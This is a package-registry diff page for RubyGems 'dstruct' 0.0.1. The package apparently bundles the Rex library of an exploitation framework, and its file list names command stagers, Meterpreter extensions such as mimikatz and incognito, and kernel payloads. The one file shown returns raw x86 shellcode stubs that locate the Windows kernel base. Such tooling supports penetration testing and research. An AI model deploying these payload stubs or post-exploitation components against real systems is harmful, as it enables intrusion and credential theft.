RubyGems - dstruct - Versions diffs - 0.0.1 - Mend

dstruct 0.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (491) hide show

checksums.yaml +15 -0
data/README.markdown +23 -0
data/examples/smb_example.rb +35 -0
data/lib/rex.rb +108 -0
data/lib/rex/LICENSE +29 -0
data/lib/rex/arch.rb +104 -0
data/lib/rex/arch/sparc.rb +75 -0
data/lib/rex/arch/x86.rb +524 -0
data/lib/rex/assembly/nasm.rb +104 -0
data/lib/rex/codepage.map +104 -0
data/lib/rex/compat.rb +389 -0
data/lib/rex/constants.rb +124 -0
data/lib/rex/elfparsey.rb +9 -0
data/lib/rex/elfparsey/elf.rb +121 -0
data/lib/rex/elfparsey/elfbase.rb +256 -0
data/lib/rex/elfparsey/exceptions.rb +25 -0
data/lib/rex/elfscan.rb +10 -0
data/lib/rex/elfscan/scanner.rb +226 -0
data/lib/rex/elfscan/search.rb +44 -0
data/lib/rex/encoder/alpha2.rb +31 -0
data/lib/rex/encoder/alpha2/alpha_mixed.rb +68 -0
data/lib/rex/encoder/alpha2/alpha_upper.rb +79 -0
data/lib/rex/encoder/alpha2/generic.rb +90 -0
data/lib/rex/encoder/alpha2/unicode_mixed.rb +116 -0
data/lib/rex/encoder/alpha2/unicode_upper.rb +123 -0
data/lib/rex/encoder/bloxor/bloxor.rb +327 -0
data/lib/rex/encoder/ndr.rb +90 -0
data/lib/rex/encoder/nonalpha.rb +61 -0
data/lib/rex/encoder/nonupper.rb +64 -0
data/lib/rex/encoder/xdr.rb +107 -0
data/lib/rex/encoder/xor.rb +69 -0
data/lib/rex/encoder/xor/dword.rb +13 -0
data/lib/rex/encoder/xor/dword_additive.rb +13 -0
data/lib/rex/encoders/xor_dword.rb +35 -0
data/lib/rex/encoders/xor_dword_additive.rb +53 -0
data/lib/rex/encoding/xor.rb +20 -0
data/lib/rex/encoding/xor/byte.rb +15 -0
data/lib/rex/encoding/xor/dword.rb +21 -0
data/lib/rex/encoding/xor/dword_additive.rb +92 -0
data/lib/rex/encoding/xor/exceptions.rb +17 -0
data/lib/rex/encoding/xor/generic.rb +146 -0
data/lib/rex/encoding/xor/qword.rb +15 -0
data/lib/rex/encoding/xor/word.rb +21 -0
data/lib/rex/exceptions.rb +275 -0
data/lib/rex/exploitation/cmdstager.rb +10 -0
data/lib/rex/exploitation/cmdstager/base.rb +190 -0
data/lib/rex/exploitation/cmdstager/bourne.rb +105 -0
data/lib/rex/exploitation/cmdstager/debug_asm.rb +140 -0
data/lib/rex/exploitation/cmdstager/debug_write.rb +134 -0
data/lib/rex/exploitation/cmdstager/echo.rb +164 -0
data/lib/rex/exploitation/cmdstager/printf.rb +122 -0
data/lib/rex/exploitation/cmdstager/tftp.rb +71 -0
data/lib/rex/exploitation/cmdstager/vbs.rb +126 -0
data/lib/rex/exploitation/egghunter.rb +425 -0
data/lib/rex/exploitation/encryptjs.rb +78 -0
data/lib/rex/exploitation/heaplib.js.b64 +331 -0
data/lib/rex/exploitation/heaplib.rb +107 -0
data/lib/rex/exploitation/js.rb +6 -0
data/lib/rex/exploitation/js/detect.rb +69 -0
data/lib/rex/exploitation/js/memory.rb +81 -0
data/lib/rex/exploitation/js/network.rb +84 -0
data/lib/rex/exploitation/js/utils.rb +33 -0
data/lib/rex/exploitation/jsobfu.rb +513 -0
data/lib/rex/exploitation/obfuscatejs.rb +336 -0
data/lib/rex/exploitation/omelet.rb +321 -0
data/lib/rex/exploitation/opcodedb.rb +819 -0
data/lib/rex/exploitation/powershell.rb +62 -0
data/lib/rex/exploitation/powershell/function.rb +63 -0
data/lib/rex/exploitation/powershell/obfu.rb +98 -0
data/lib/rex/exploitation/powershell/output.rb +151 -0
data/lib/rex/exploitation/powershell/param.rb +23 -0
data/lib/rex/exploitation/powershell/parser.rb +183 -0
data/lib/rex/exploitation/powershell/psh_methods.rb +70 -0
data/lib/rex/exploitation/powershell/script.rb +99 -0
data/lib/rex/exploitation/ropdb.rb +190 -0
data/lib/rex/exploitation/seh.rb +93 -0
data/lib/rex/file.rb +160 -0
data/lib/rex/image_source.rb +10 -0
data/lib/rex/image_source/disk.rb +58 -0
data/lib/rex/image_source/image_source.rb +44 -0
data/lib/rex/image_source/memory.rb +35 -0
data/lib/rex/io/bidirectional_pipe.rb +161 -0
data/lib/rex/io/datagram_abstraction.rb +35 -0
data/lib/rex/io/ring_buffer.rb +369 -0
data/lib/rex/io/stream.rb +312 -0
data/lib/rex/io/stream_abstraction.rb +209 -0
data/lib/rex/io/stream_server.rb +221 -0
data/lib/rex/job_container.rb +200 -0
data/lib/rex/logging.rb +4 -0
data/lib/rex/logging/log_dispatcher.rb +180 -0
data/lib/rex/logging/log_sink.rb +43 -0
data/lib/rex/logging/sinks/flatfile.rb +56 -0
data/lib/rex/logging/sinks/stderr.rb +44 -0
data/lib/rex/mac_oui.rb +16581 -0
data/lib/rex/machparsey.rb +9 -0
data/lib/rex/machparsey/exceptions.rb +34 -0
data/lib/rex/machparsey/mach.rb +209 -0
data/lib/rex/machparsey/machbase.rb +408 -0
data/lib/rex/machscan.rb +9 -0
data/lib/rex/machscan/scanner.rb +217 -0
data/lib/rex/mime.rb +10 -0
data/lib/rex/mime/encoding.rb +17 -0
data/lib/rex/mime/header.rb +78 -0
data/lib/rex/mime/message.rb +150 -0
data/lib/rex/mime/part.rb +50 -0
data/lib/rex/nop/opty2.rb +109 -0
data/lib/rex/nop/opty2_tables.rb +301 -0
data/lib/rex/ole.rb +202 -0
data/lib/rex/ole/clsid.rb +44 -0
data/lib/rex/ole/difat.rb +138 -0
data/lib/rex/ole/directory.rb +228 -0
data/lib/rex/ole/direntry.rb +237 -0
data/lib/rex/ole/docs/dependencies.txt +8 -0
data/lib/rex/ole/docs/references.txt +1 -0
data/lib/rex/ole/fat.rb +96 -0
data/lib/rex/ole/header.rb +201 -0
data/lib/rex/ole/minifat.rb +74 -0
data/lib/rex/ole/propset.rb +141 -0
data/lib/rex/ole/samples/create_ole.rb +27 -0
data/lib/rex/ole/samples/dir.rb +35 -0
data/lib/rex/ole/samples/dump_stream.rb +34 -0
data/lib/rex/ole/samples/ole_info.rb +23 -0
data/lib/rex/ole/storage.rb +392 -0
data/lib/rex/ole/stream.rb +50 -0
data/lib/rex/ole/substorage.rb +46 -0
data/lib/rex/ole/util.rb +154 -0
data/lib/rex/parser/acunetix_nokogiri.rb +406 -0
data/lib/rex/parser/apple_backup_manifestdb.rb +132 -0
data/lib/rex/parser/appscan_nokogiri.rb +367 -0
data/lib/rex/parser/arguments.rb +108 -0
data/lib/rex/parser/burp_session_nokogiri.rb +291 -0
data/lib/rex/parser/ci_nokogiri.rb +193 -0
data/lib/rex/parser/foundstone_nokogiri.rb +342 -0
data/lib/rex/parser/fusionvm_nokogiri.rb +109 -0
data/lib/rex/parser/group_policy_preferences.rb +185 -0
data/lib/rex/parser/ini.rb +186 -0
data/lib/rex/parser/ip360_aspl_xml.rb +103 -0
data/lib/rex/parser/ip360_xml.rb +98 -0
data/lib/rex/parser/mbsa_nokogiri.rb +256 -0
data/lib/rex/parser/nessus_xml.rb +121 -0
data/lib/rex/parser/netsparker_xml.rb +109 -0
data/lib/rex/parser/nexpose_raw_nokogiri.rb +686 -0
data/lib/rex/parser/nexpose_simple_nokogiri.rb +330 -0
data/lib/rex/parser/nexpose_xml.rb +172 -0
data/lib/rex/parser/nmap_nokogiri.rb +394 -0
data/lib/rex/parser/nmap_xml.rb +166 -0
data/lib/rex/parser/nokogiri_doc_mixin.rb +233 -0
data/lib/rex/parser/openvas_nokogiri.rb +172 -0
data/lib/rex/parser/outpost24_nokogiri.rb +240 -0
data/lib/rex/parser/retina_xml.rb +110 -0
data/lib/rex/parser/unattend.rb +171 -0
data/lib/rex/parser/wapiti_nokogiri.rb +105 -0
data/lib/rex/payloads.rb +2 -0
data/lib/rex/payloads/win32.rb +3 -0
data/lib/rex/payloads/win32/common.rb +27 -0
data/lib/rex/payloads/win32/kernel.rb +54 -0
data/lib/rex/payloads/win32/kernel/common.rb +55 -0
data/lib/rex/payloads/win32/kernel/migration.rb +13 -0
data/lib/rex/payloads/win32/kernel/recovery.rb +51 -0
data/lib/rex/payloads/win32/kernel/stager.rb +195 -0
data/lib/rex/peparsey.rb +10 -0
data/lib/rex/peparsey/exceptions.rb +30 -0
data/lib/rex/peparsey/pe.rb +210 -0
data/lib/rex/peparsey/pe_memdump.rb +61 -0
data/lib/rex/peparsey/pebase.rb +1662 -0
data/lib/rex/peparsey/section.rb +128 -0
data/lib/rex/pescan.rb +11 -0
data/lib/rex/pescan/analyze.rb +366 -0
data/lib/rex/pescan/scanner.rb +230 -0
data/lib/rex/pescan/search.rb +68 -0
data/lib/rex/platforms.rb +2 -0
data/lib/rex/platforms/windows.rb +52 -0
data/lib/rex/poly.rb +134 -0
data/lib/rex/poly/block.rb +480 -0
data/lib/rex/poly/machine.rb +13 -0
data/lib/rex/poly/machine/machine.rb +830 -0
data/lib/rex/poly/machine/x86.rb +509 -0
data/lib/rex/poly/register.rb +101 -0
data/lib/rex/poly/register/x86.rb +41 -0
data/lib/rex/post.rb +7 -0
data/lib/rex/post/dir.rb +51 -0
data/lib/rex/post/file.rb +172 -0
data/lib/rex/post/file_stat.rb +220 -0
data/lib/rex/post/gen.pl +13 -0
data/lib/rex/post/io.rb +182 -0
data/lib/rex/post/meterpreter.rb +5 -0
data/lib/rex/post/meterpreter/channel.rb +446 -0
data/lib/rex/post/meterpreter/channel_container.rb +54 -0
data/lib/rex/post/meterpreter/channels/pool.rb +160 -0
data/lib/rex/post/meterpreter/channels/pools/file.rb +62 -0
data/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +103 -0
data/lib/rex/post/meterpreter/channels/stream.rb +87 -0
data/lib/rex/post/meterpreter/client.rb +483 -0
data/lib/rex/post/meterpreter/client_core.rb +352 -0
data/lib/rex/post/meterpreter/dependencies.rb +3 -0
data/lib/rex/post/meterpreter/extension.rb +32 -0
data/lib/rex/post/meterpreter/extensions/android/android.rb +128 -0
data/lib/rex/post/meterpreter/extensions/android/tlv.rb +40 -0
data/lib/rex/post/meterpreter/extensions/espia/espia.rb +58 -0
data/lib/rex/post/meterpreter/extensions/espia/tlv.rb +17 -0
data/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb +71 -0
data/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb +169 -0
data/lib/rex/post/meterpreter/extensions/extapi/extapi.rb +45 -0
data/lib/rex/post/meterpreter/extensions/extapi/service/service.rb +104 -0
data/lib/rex/post/meterpreter/extensions/extapi/tlv.rb +77 -0
data/lib/rex/post/meterpreter/extensions/extapi/window/window.rb +56 -0
data/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb +75 -0
data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +94 -0
data/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +22 -0
data/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +361 -0
data/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb +76 -0
data/lib/rex/post/meterpreter/extensions/lanattacks/dhcp/dhcp.rb +78 -0
data/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb +43 -0
data/lib/rex/post/meterpreter/extensions/lanattacks/tftp/tftp.rb +49 -0
data/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb +17 -0
data/lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb +128 -0
data/lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb +16 -0
data/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb +57 -0
data/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb +16 -0
data/lib/rex/post/meterpreter/extensions/priv/fs.rb +118 -0
data/lib/rex/post/meterpreter/extensions/priv/passwd.rb +61 -0
data/lib/rex/post/meterpreter/extensions/priv/priv.rb +109 -0
data/lib/rex/post/meterpreter/extensions/priv/tlv.rb +29 -0
data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +117 -0
data/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb +27 -0
data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +396 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +284 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +399 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +104 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +48 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/arp.rb +59 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +256 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +129 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/netstat.rb +97 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/resolve.rb +106 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +67 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +139 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +180 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +168 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +209 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb +38146 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb +48 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb +2102 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_crypt32.rb +32 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_iphlpapi.rb +97 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb +3852 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb +100 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ntdll.rb +168 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_psapi.rb +32 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb +32 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_user32.rb +3170 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_version.rb +41 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wlanapi.rb +87 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb +128 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb +613 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb +388 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb +111 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb +149 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb +27 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/mock_magic.rb +515 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb +319 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb +23 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb +301 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/tlv.rb +56 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb +106 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/util.rb +676 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb +96 -0
data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +151 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +128 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +192 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +41 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +60 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +408 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +129 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +55 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +336 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +141 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +328 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +193 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +102 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb +188 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +180 -0
data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +236 -0
data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +259 -0
data/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +201 -0
data/lib/rex/post/meterpreter/inbound_packet_handler.rb +30 -0
data/lib/rex/post/meterpreter/object_aliases.rb +83 -0
data/lib/rex/post/meterpreter/packet.rb +709 -0
data/lib/rex/post/meterpreter/packet_dispatcher.rb +543 -0
data/lib/rex/post/meterpreter/packet_parser.rb +94 -0
data/lib/rex/post/meterpreter/packet_response_waiter.rb +83 -0
data/lib/rex/post/meterpreter/ui/console.rb +142 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +86 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +383 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +939 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +109 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi.rb +65 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb +198 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb +444 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb +199 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/window.rb +118 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb +108 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +242 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +509 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks.rb +60 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb +254 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp.rb +159 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb +182 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb +232 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +62 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +97 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +52 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +133 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +204 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +66 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +527 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +448 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +906 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +318 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb +343 -0
data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +99 -0
data/lib/rex/post/permission.rb +26 -0
data/lib/rex/post/process.rb +57 -0
data/lib/rex/post/thread.rb +57 -0
data/lib/rex/post/ui.rb +52 -0
data/lib/rex/proto.rb +15 -0
data/lib/rex/proto/addp.rb +218 -0
data/lib/rex/proto/dcerpc.rb +7 -0
data/lib/rex/proto/dcerpc/client.rb +362 -0
data/lib/rex/proto/dcerpc/exceptions.rb +151 -0
data/lib/rex/proto/dcerpc/handle.rb +48 -0
data/lib/rex/proto/dcerpc/ndr.rb +73 -0
data/lib/rex/proto/dcerpc/packet.rb +264 -0
data/lib/rex/proto/dcerpc/response.rb +188 -0
data/lib/rex/proto/dcerpc/uuid.rb +85 -0
data/lib/rex/proto/dcerpc/wdscp.rb +3 -0
data/lib/rex/proto/dcerpc/wdscp/constants.rb +89 -0
data/lib/rex/proto/dcerpc/wdscp/packet.rb +94 -0
data/lib/rex/proto/dhcp.rb +7 -0
data/lib/rex/proto/dhcp/constants.rb +34 -0
data/lib/rex/proto/dhcp/server.rb +334 -0
data/lib/rex/proto/drda.rb +6 -0
data/lib/rex/proto/drda/constants.rb +50 -0
data/lib/rex/proto/drda/packet.rb +253 -0
data/lib/rex/proto/drda/utils.rb +124 -0
data/lib/rex/proto/http.rb +7 -0
data/lib/rex/proto/http/client.rb +722 -0
data/lib/rex/proto/http/client_request.rb +472 -0
data/lib/rex/proto/http/handler.rb +47 -0
data/lib/rex/proto/http/handler/erb.rb +129 -0
data/lib/rex/proto/http/handler/proc.rb +61 -0
data/lib/rex/proto/http/header.rb +173 -0
data/lib/rex/proto/http/packet.rb +414 -0
data/lib/rex/proto/http/request.rb +354 -0
data/lib/rex/proto/http/response.rb +151 -0
data/lib/rex/proto/http/server.rb +385 -0
data/lib/rex/proto/iax2.rb +2 -0
data/lib/rex/proto/iax2/call.rb +326 -0
data/lib/rex/proto/iax2/client.rb +218 -0
data/lib/rex/proto/iax2/codecs.rb +5 -0
data/lib/rex/proto/iax2/codecs/alaw.rb +16 -0
data/lib/rex/proto/iax2/codecs/g711.rb +2176 -0
data/lib/rex/proto/iax2/codecs/mulaw.rb +17 -0
data/lib/rex/proto/iax2/constants.rb +262 -0
data/lib/rex/proto/ipmi.rb +57 -0
data/lib/rex/proto/ipmi/channel_auth_reply.rb +89 -0
data/lib/rex/proto/ipmi/open_session_reply.rb +36 -0
data/lib/rex/proto/ipmi/rakp2.rb +36 -0
data/lib/rex/proto/ipmi/utils.rb +125 -0
data/lib/rex/proto/natpmp.rb +7 -0
data/lib/rex/proto/natpmp/constants.rb +19 -0
data/lib/rex/proto/natpmp/packet.rb +45 -0
data/lib/rex/proto/ntlm.rb +8 -0
data/lib/rex/proto/ntlm/base.rb +327 -0
data/lib/rex/proto/ntlm/constants.rb +75 -0
data/lib/rex/proto/ntlm/crypt.rb +412 -0
data/lib/rex/proto/ntlm/exceptions.rb +17 -0
data/lib/rex/proto/ntlm/message.rb +534 -0
data/lib/rex/proto/ntlm/utils.rb +765 -0
data/lib/rex/proto/ntp.rb +3 -0
data/lib/rex/proto/ntp/constants.rb +12 -0
data/lib/rex/proto/ntp/modes.rb +130 -0
data/lib/rex/proto/pjl.rb +31 -0
data/lib/rex/proto/pjl/client.rb +163 -0
data/lib/rex/proto/proxy/socks4a.rb +441 -0
data/lib/rex/proto/rfb.rb +13 -0
data/lib/rex/proto/rfb/cipher.rb +82 -0
data/lib/rex/proto/rfb/client.rb +205 -0
data/lib/rex/proto/rfb/constants.rb +50 -0
data/lib/rex/proto/sip.rb +4 -0
data/lib/rex/proto/sip/response.rb +61 -0
data/lib/rex/proto/smb.rb +8 -0
data/lib/rex/proto/smb/client.rb +2064 -0
data/lib/rex/proto/smb/constants.rb +1064 -0
data/lib/rex/proto/smb/crypt.rb +37 -0
data/lib/rex/proto/smb/evasions.rb +67 -0
data/lib/rex/proto/smb/exceptions.rb +867 -0
data/lib/rex/proto/smb/simpleclient.rb +173 -0
data/lib/rex/proto/smb/simpleclient/open_file.rb +106 -0
data/lib/rex/proto/smb/simpleclient/open_pipe.rb +57 -0
data/lib/rex/proto/smb/utils.rb +104 -0
data/lib/rex/proto/sunrpc.rb +2 -0
data/lib/rex/proto/sunrpc/client.rb +196 -0
data/lib/rex/proto/tftp.rb +13 -0
data/lib/rex/proto/tftp/client.rb +344 -0
data/lib/rex/proto/tftp/constants.rb +39 -0
data/lib/rex/proto/tftp/server.rb +497 -0
data/lib/rex/random_identifier_generator.rb +177 -0
data/lib/rex/registry.rb +14 -0
data/lib/rex/registry/hive.rb +132 -0
data/lib/rex/registry/lfkey.rb +51 -0
data/lib/rex/registry/nodekey.rb +54 -0
data/lib/rex/registry/regf.rb +25 -0
data/lib/rex/registry/valuekey.rb +67 -0
data/lib/rex/registry/valuelist.rb +29 -0
data/lib/rex/ropbuilder.rb +8 -0
data/lib/rex/ropbuilder/rop.rb +271 -0
data/lib/rex/script.rb +42 -0
data/lib/rex/script/base.rb +61 -0
data/lib/rex/script/meterpreter.rb +16 -0
data/lib/rex/script/shell.rb +10 -0
data/lib/rex/service.rb +49 -0
data/lib/rex/service_manager.rb +154 -0
data/lib/rex/services/local_relay.rb +424 -0
data/lib/rex/socket.rb +788 -0
data/lib/rex/socket/comm.rb +120 -0
data/lib/rex/socket/comm/local.rb +526 -0
data/lib/rex/socket/ip.rb +132 -0
data/lib/rex/socket/parameters.rb +363 -0
data/lib/rex/socket/range_walker.rb +470 -0
data/lib/rex/socket/ssl_tcp.rb +345 -0
data/lib/rex/socket/ssl_tcp_server.rb +188 -0
data/lib/rex/socket/subnet_walker.rb +76 -0
data/lib/rex/socket/switch_board.rb +289 -0
data/lib/rex/socket/tcp.rb +79 -0
data/lib/rex/socket/tcp_server.rb +67 -0
data/lib/rex/socket/udp.rb +165 -0
data/lib/rex/sslscan/result.rb +201 -0
data/lib/rex/sslscan/scanner.rb +206 -0
data/lib/rex/struct2.rb +5 -0
data/lib/rex/struct2/c_struct.rb +181 -0
data/lib/rex/struct2/c_struct_template.rb +39 -0
data/lib/rex/struct2/constant.rb +26 -0
data/lib/rex/struct2/element.rb +44 -0
data/lib/rex/struct2/generic.rb +73 -0
data/lib/rex/struct2/restraint.rb +54 -0
data/lib/rex/struct2/s_string.rb +72 -0
data/lib/rex/struct2/s_struct.rb +111 -0
data/lib/rex/sync.rb +6 -0
data/lib/rex/sync/event.rb +85 -0
data/lib/rex/sync/read_write_lock.rb +177 -0
data/lib/rex/sync/ref.rb +58 -0
data/lib/rex/sync/thread_safe.rb +83 -0
data/lib/rex/text.rb +1813 -0
data/lib/rex/thread_factory.rb +43 -0
data/lib/rex/time.rb +66 -0
data/lib/rex/transformer.rb +116 -0
data/lib/rex/ui.rb +22 -0
data/lib/rex/ui/interactive.rb +304 -0
data/lib/rex/ui/output.rb +85 -0
data/lib/rex/ui/output/none.rb +19 -0
data/lib/rex/ui/progress_tracker.rb +97 -0
data/lib/rex/ui/subscriber.rb +160 -0
data/lib/rex/ui/text/color.rb +98 -0
data/lib/rex/ui/text/dispatcher_shell.rb +538 -0
data/lib/rex/ui/text/input.rb +119 -0
data/lib/rex/ui/text/input/buffer.rb +79 -0
data/lib/rex/ui/text/input/readline.rb +129 -0
data/lib/rex/ui/text/input/socket.rb +96 -0
data/lib/rex/ui/text/input/stdio.rb +46 -0
data/lib/rex/ui/text/irb_shell.rb +62 -0
data/lib/rex/ui/text/output.rb +86 -0
data/lib/rex/ui/text/output/buffer.rb +62 -0
data/lib/rex/ui/text/output/buffer/stdout.rb +26 -0
data/lib/rex/ui/text/output/file.rb +44 -0
data/lib/rex/ui/text/output/socket.rb +44 -0
data/lib/rex/ui/text/output/stdio.rb +53 -0
data/lib/rex/ui/text/output/tee.rb +56 -0
data/lib/rex/ui/text/progress_tracker.rb +57 -0
data/lib/rex/ui/text/shell.rb +403 -0
data/lib/rex/ui/text/table.rb +346 -0
data/lib/rex/zip.rb +96 -0
data/lib/rex/zip/archive.rb +130 -0
data/lib/rex/zip/blocks.rb +184 -0
data/lib/rex/zip/entry.rb +122 -0
data/lib/rex/zip/jar.rb +283 -0
data/lib/rex/zip/samples/comment.rb +32 -0
data/lib/rex/zip/samples/mkwar.rb +138 -0
data/lib/rex/zip/samples/mkzip.rb +19 -0
data/lib/rex/zip/samples/recursive.rb +58 -0
metadata +536 -0

data/lib/rex/payloads/win32/kernel/common.rb ADDED

@@ -0,0 +1,55 @@
+# -*- coding: binary -*-
+module Rex
+module Payloads
+module Win32
+module Kernel
+require 'rex/payloads/win32/common'
+#
+# This class provides common methods that may be shared across more than
+# one kernel-mode payload.  Many of these are from the following paper:
+#
+# http://www.uninformed.org/?v=3&a=4&t=sumry
+#
+module Common
+  #
+  # Returns a stub that will find the base address of ntoskrnl and
+  # place it in eax.  This method works by using an IDT entry.  Credit
+  # to eEye.
+  #
+  def self.find_nt_idt_eeye
+    "\x8b\x35\x38\xf0\xdf\xff\xad\xad\x48\x81\x38\x4d\x5a\x90\x00\x75\xf7"
+  end
+  #
+  # Returns a stub that will find the base address of ntoskrnl and
+  # place it in eax.  This method uses a pointer found in KdVersionBlock.
+  #
+  def self.find_nt_kdversionblock
+    "\x31\xc0\x64\x8b\x40\x34\x8b\x40\x10"
+  end
+  #
+  # Returns a stub that will find the base address of ntoskrnl and
+  # place it in eax.  This method uses a pointer found in the
+  # processor control region as a starting point.
+  #
+  def self.find_nt_pcr
+    "\xa1\x2c\xf1\xdf\xff\x66\x25\x01\xf0\x48\x66\x81\x38\x4d\x5a\x75\xf4"
+  end
+  #
+  # Alias for resolving symbols.
